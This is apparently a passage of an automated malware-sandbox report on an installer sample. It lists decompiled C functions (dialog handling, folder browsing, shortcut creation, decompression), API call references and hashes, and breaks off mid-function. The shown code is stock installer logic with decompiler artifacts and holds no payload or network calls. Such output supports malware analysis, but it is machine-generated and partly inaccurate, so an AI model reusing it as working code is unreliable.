                                                                                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                    				_push(0x1b);
                                                                                    				E0040417B(_a4);
                                                                                    				if(( *0x42f43c & 0x00000003) != 0) {
                                                                                    					ShowWindow( *0x42ebf0, _t150);
                                                                                    					if(( *0x42f43c & 0x00000002) != 0) {
                                                                                    						 *0x42ebf0 = _t150;
                                                                                    					} else {
                                                                                    						ShowWindow(_v8, 8);
                                                                                    					}
                                                                                    					E004041B0( *0x42ebe8);
                                                                                    				}
                                                                                    				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                    				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                    				if(( *0x42f43c & 0x00000004) != 0) {
                                                                                    					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                    					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                    				}
                                                                                    				goto L36;
                                                                                    			}
                                                                                    0x00405466
                                                                                    0x00405474
                                                                                    0x00405474
                                                                                    0x00405479
                                                                                    0x0040547c
                                                                                    0x00405481
                                                                                    0x0040548d
                                                                                    0x00405496
                                                                                    0x004054a3
                                                                                    0x004054b2
                                                                                    0x004054a5
                                                                                    0x004054aa
                                                                                    0x004054aa
                                                                                    0x004054be
                                                                                    0x004054be
                                                                                    0x004054d2
                                                                                    0x004054db
                                                                                    0x004054e4
                                                                                    0x004054f4
                                                                                    0x00405500
                                                                                    0x00405500
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 004053BB
                                                                                    • GetDlgItem.USER32 ref: 004053CA
                                                                                    • GetClientRect.USER32 ref: 00405407
                                                                                    • GetSystemMetrics.USER32 ref: 0040540E
                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                                    • GetDlgItem.USER32 ref: 004054CB
                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                                    • GetDlgItem.USER32 ref: 004053D9
                                                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                                    • GetDlgItem.USER32 ref: 0040551C
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                                    • ShowWindow.USER32(00000000), ref: 00405554
                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                                    • ShowWindow.USER32(00000008), ref: 004055A1
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                                    • CreatePopupMenu.USER32 ref: 004055E6
                                                                                    • AppendMenuA.USER32 ref: 004055FB
                                                                                    • GetWindowRect.USER32 ref: 0040561B
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405680
                                                                                    • EmptyClipboard.USER32 ref: 00405686
                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                                    • GlobalLock.KERNEL32 ref: 00405699
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                                    • CloseClipboard.USER32 ref: 004056D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 590372296-0
                                                                                    • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                                    • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                                    • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                                    • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				long _v16;
                                                                                    				long _v20;
                                                                                    				long _v24;
                                                                                    				char _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				long _v36;
                                                                                    				char _v40;
                                                                                    				unsigned int _v44;
                                                                                    				signed int _v48;
                                                                                    				CHAR* _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				CHAR* _v72;
                                                                                    				void _v76;
                                                                                    				struct HWND__* _v80;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t82;
                                                                                    				long _t87;
                                                                                    				signed char* _t89;
                                                                                    				void* _t95;
                                                                                    				signed int _t96;
                                                                                    				int _t109;
                                                                                    				signed char _t114;
                                                                                    				signed int _t118;
                                                                                    				struct HWND__** _t122;
                                                                                    				intOrPtr* _t138;
                                                                                    				CHAR* _t146;
                                                                                    				intOrPtr _t147;
                                                                                    				unsigned int _t150;
                                                                                    				signed int _t152;
                                                                                    				unsigned int _t156;
                                                                                    				signed int _t158;
                                                                                    				signed int* _t159;
                                                                                    				signed char* _t160;
                                                                                    				struct HWND__* _t165;
                                                                                    				struct HWND__* _t166;
                                                                                    				int _t168;
                                                                                    				unsigned int _t197;
                                                                                    
                                                                                    				_t156 = __edx;
                                                                                    				_t82 =  *0x42a068;
                                                                                    				_v32 = _t82;
                                                                                    				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                    				if(_a8 == 0x40b) {
                                                                                    					E004057F7(0x3fb, _t146);
                                                                                    					E004063D2(_t146);
                                                                                    				}
                                                                                    				_t166 = _a4;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					L8:
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L20:
                                                                                    						if(_a8 == 0x40f) {
                                                                                    							L22:
                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                    							_v12 = _v12 & 0x00000000;
                                                                                    							E004057F7(0x3fb, _t146);
                                                                                    							if(E00405B7D(_t185, _t146) == 0) {
                                                                                    								_v8 = 1;
                                                                                    							}
                                                                                    							E004060F7(0x429860, _t146);
                                                                                    							_t87 = E00406500(1);
                                                                                    							_v16 = _t87;
                                                                                    							if(_t87 == 0) {
                                                                                    								L30:
                                                                                    								E004060F7(0x429860, _t146);
                                                                                    								_t89 = E00405B28(0x429860);
                                                                                    								_t158 = 0;
                                                                                    								if(_t89 != 0) {
                                                                                    									 *_t89 =  *_t89 & 0x00000000;
                                                                                    								}
                                                                                    								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                    									goto L35;
                                                                                    								} else {
                                                                                    									_t168 = 0x400;
                                                                                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                    									asm("cdq");
                                                                                    									_v48 = _t109;
                                                                                    									_v44 = _t156;
                                                                                    									_v12 = 1;
                                                                                    									goto L36;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t159 = 0;
                                                                                    								if(0 == 0x429860) {
                                                                                    									goto L30;
                                                                                    								} else {
                                                                                    									goto L26;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									L26:
                                                                                    									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
                                                                                    									if(_t114 != 0) {
                                                                                    										break;
                                                                                    									}
                                                                                    									if(_t159 != 0) {
                                                                                    										 *_t159 =  *_t159 & _t114;
                                                                                    									}
                                                                                    									_t160 = E00405AD6(0x429860);
                                                                                    									 *_t160 =  *_t160 & 0x00000000;
                                                                                    									_t159 = _t160 - 1;
                                                                                    									 *_t159 = 0x5c;
                                                                                    									if(_t159 != 0x429860) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L30;
                                                                                    									}
                                                                                    								}
                                                                                    								_t150 = _v44;
                                                                                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                    								_v44 = _t150 >> 0xa;
                                                                                    								_v12 = 1;
                                                                                    								_t158 = 0;
                                                                                    								__eflags = 0;
                                                                                    								L35:
                                                                                    								_t168 = 0x400;
                                                                                    								L36:
                                                                                    								_t95 = E00404AA1(5);
                                                                                    								if(_v12 != _t158) {
                                                                                    									_t197 = _v44;
                                                                                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                    										_v8 = 2;
                                                                                    									}
                                                                                    								}
                                                                                    								_t147 =  *0x42ebfc; // 0x63d143
                                                                                    								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                    									E00404A89(0x3ff, 0xfffffffb, _t95);
                                                                                    									if(_v12 == _t158) {
                                                                                    										SetDlgItemTextA(_a4, _t168, 0x429850);
                                                                                    									} else {
                                                                                    										E004049C4(_t168, 0xfffffffc, _v48, _v44);
                                                                                    									}
                                                                                    								}
                                                                                    								_t96 = _v8;
                                                                                    								 *0x42f4e4 = _t96;
                                                                                    								if(_t96 == _t158) {
                                                                                    									_v8 = E0040140B(7);
                                                                                    								}
                                                                                    								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                    									_v8 = _t158;
                                                                                    								}
                                                                                    								E0040419D(0 | _v8 == _t158);
                                                                                    								if(_v8 == _t158 &&  *0x42a880 == _t158) {
                                                                                    									E00404566();
                                                                                    								}
                                                                                    								 *0x42a880 = _t158;
                                                                                    								goto L53;
                                                                                    							}
                                                                                    						}
                                                                                    						_t185 = _a8 - 0x405;
                                                                                    						if(_a8 != 0x405) {
                                                                                    							goto L53;
                                                                                    						}
                                                                                    						goto L22;
                                                                                    					}
                                                                                    					_t118 = _a12 & 0x0000ffff;
                                                                                    					if(_t118 != 0x3fb) {
                                                                                    						L12:
                                                                                    						if(_t118 == 0x3e9) {
                                                                                    							_t152 = 7;
                                                                                    							memset( &_v76, 0, _t152 << 2);
                                                                                    							_v80 = _t166;
                                                                                    							_v72 = 0x42a890;
                                                                                    							_v60 = E0040495E;
                                                                                    							_v56 = _t146;
                                                                                    							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
                                                                                    							_t122 =  &_v80;
                                                                                    							_v64 = 0x41;
                                                                                    							__imp__SHBrowseForFolderA(_t122);
                                                                                    							if(_t122 == 0) {
                                                                                    								_a8 = 0x40f;
                                                                                    							} else {
                                                                                    								__imp__CoTaskMemFree(_t122);
                                                                                    								E00405A8F(_t146);
                                                                                    								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
                                                                                    								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                                                                                    									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
                                                                                    									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
                                                                                    										lstrcatA(_t146, 0x42e3c0);
                                                                                    									}
                                                                                    								}
                                                                                    								 *0x42a880 =  *0x42a880 + 1;
                                                                                    								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L20;
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0x300) {
                                                                                    						goto L53;
                                                                                    					}
                                                                                    					_a8 = 0x40f;
                                                                                    					goto L12;
                                                                                    				} else {
                                                                                    					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                    					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
                                                                                    						E00405A8F(_t146);
                                                                                    					}
                                                                                    					 *0x42ebf8 = _t166;
                                                                                    					SetWindowTextA(_t165, _t146);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                    					_push(1);
                                                                                    					E0040417B(_t166);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                    					_push(0x14);
                                                                                    					E0040417B(_t166);
                                                                                    					E004041B0(_t165);
                                                                                    					_t138 = E00406500(8);
                                                                                    					if(_t138 == 0) {
                                                                                    						L53:
                                                                                    						return E004041E2(_a8, _a12, _a16);
                                                                                    					} else {
                                                                                    						 *_t138(_t165, 1);
                                                                                    						goto L8;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 0040465C
                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                                    • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                                    • lstrcmpiA.KERNEL32(uvlcopdlxoed,0042A890,00000000,?,?), ref: 00404774
                                                                                    • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 00404780
                                                                                    • SetDlgItemTextA.USER32 ref: 00404792
                                                                                      • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                      • Part of subcall function 004063D2: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                                      • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                      • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                                      • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$uvlcopdlxoed
                                                                                    • API String ID: 2624150263-915887145
                                                                                    • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                                    • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                                    • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                                    • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E0040216B() {
                                                                                    				signed int _t55;
                                                                                    				void* _t59;
                                                                                    				intOrPtr* _t63;
                                                                                    				intOrPtr _t64;
                                                                                    				intOrPtr* _t65;
                                                                                    				intOrPtr* _t67;
                                                                                    				intOrPtr* _t69;
                                                                                    				intOrPtr* _t71;
                                                                                    				intOrPtr* _t73;
                                                                                    				intOrPtr* _t75;
                                                                                    				intOrPtr* _t78;
                                                                                    				intOrPtr* _t80;
                                                                                    				intOrPtr* _t82;
                                                                                    				intOrPtr* _t84;
                                                                                    				int _t87;
                                                                                    				intOrPtr* _t95;
                                                                                    				signed int _t105;
                                                                                    				signed int _t109;
                                                                                    				void* _t111;
                                                                                    
                                                                                    				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                                                    				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                                                    				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                                                    				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                                                    				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                                                    				_t55 =  *(_t111 - 0x18);
                                                                                    				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                                    				_t105 = _t55 & 0x00008000;
                                                                                    				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                    				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                    				if(E00405AFC( *(_t111 - 0xc)) == 0) {
                                                                                    					E00402BCE(0x21);
                                                                                    				}
                                                                                    				_t59 = _t111 + 8;
                                                                                    				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                                                    				if(_t59 < _t87) {
                                                                                    					L15:
                                                                                    					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                    					_push(0xfffffff0);
                                                                                    				} else {
                                                                                    					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                    					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                                                    					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                    					if(_t64 >= _t87) {
                                                                                    						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                    						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                    						if(_t105 == _t87) {
                                                                                    							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                    							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                                    						}
                                                                                    						if(_t109 != _t87) {
                                                                                    							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                    							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                    						}
                                                                                    						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                    						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                                    						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                                    						if( *_t95 != _t87) {
                                                                                    							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                    							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                                    						}
                                                                                    						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                    						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                                    						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                    						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                                    						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                    							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                    							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                    								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                    								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                    							}
                                                                                    						}
                                                                                    						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                    						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                    					}
                                                                                    					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                    					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                    					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                    						_push(0xfffffff4);
                                                                                    					} else {
                                                                                    						goto L15;
                                                                                    					}
                                                                                    				}
                                                                                    				E00401423();
                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
                                                                                    				return 0;
                                                                                    			}























                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 123533781-47812868
                                                                                    • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                                    • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                                    • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                                    • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 39%
                                                                                    			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                                                    				void* _t19;
                                                                                    
                                                                                    				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                                                    					E00406055(__edi, _t6);
                                                                                    					_push(_t19 - 0x1a4);
                                                                                    					_push(__esi);
                                                                                    					E004060F7();
                                                                                    				} else {
                                                                                    					 *__edi = __ebx;
                                                                                    					 *__esi = __ebx;
                                                                                    					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                    				}
                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
                                                                                    				return 0;
                                                                                    			}





                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                                                    • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                                    • Opcode Fuzzy Hash: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                                                    • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			E00406945(signed int __ebx, signed int* __esi) {
                                                                                    				signed int _t396;
                                                                                    				signed int _t425;
                                                                                    				signed int _t442;
                                                                                    				signed int _t443;
                                                                                    				signed int* _t446;
                                                                                    				void* _t448;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					_t446 = __esi;
                                                                                    					_t425 = __ebx;
                                                                                    					if( *(_t448 - 0x34) == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					L55:
                                                                                    					__eax =  *(__ebp - 0x38);
                                                                                    					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    					__ecx = __ebx;
                                                                                    					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    					__ebx = __ebx + 8;
                                                                                    					while(1) {
                                                                                    						L56:
                                                                                    						if(__ebx < 0xe) {
                                                                                    							goto L0;
                                                                                    						}
                                                                                    						L57:
                                                                                    						__eax =  *(__ebp - 0x40);
                                                                                    						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                    						__ecx = __eax;
                                                                                    						__esi[1] = __eax;
                                                                                    						__ecx = __eax & 0x0000001f;
                                                                                    						if(__cl > 0x1d) {
                                                                                    							L9:
                                                                                    							_t443 = _t442 | 0xffffffff;
                                                                                    							 *_t446 = 0x11;
                                                                                    							L10:
                                                                                    							_t446[0x147] =  *(_t448 - 0x40);
                                                                                    							_t446[0x146] = _t425;
                                                                                    							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                    							L11:
                                                                                    							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                    							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                    							E004070B4( *(_t448 + 8));
                                                                                    							return _t443;
                                                                                    						}
                                                                                    						L58:
                                                                                    						__eax = __eax & 0x000003e0;
                                                                                    						if(__eax > 0x3a0) {
                                                                                    							goto L9;
                                                                                    						}
                                                                                    						L59:
                                                                                    						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                    						__ebx = __ebx - 0xe;
                                                                                    						_t94 =  &(__esi[2]);
                                                                                    						 *_t94 = __esi[2] & 0x00000000;
                                                                                    						 *__esi = 0xc;
                                                                                    						while(1) {
                                                                                    							L60:
                                                                                    							__esi[1] = __esi[1] >> 0xa;
                                                                                    							__eax = (__esi[1] >> 0xa) + 4;
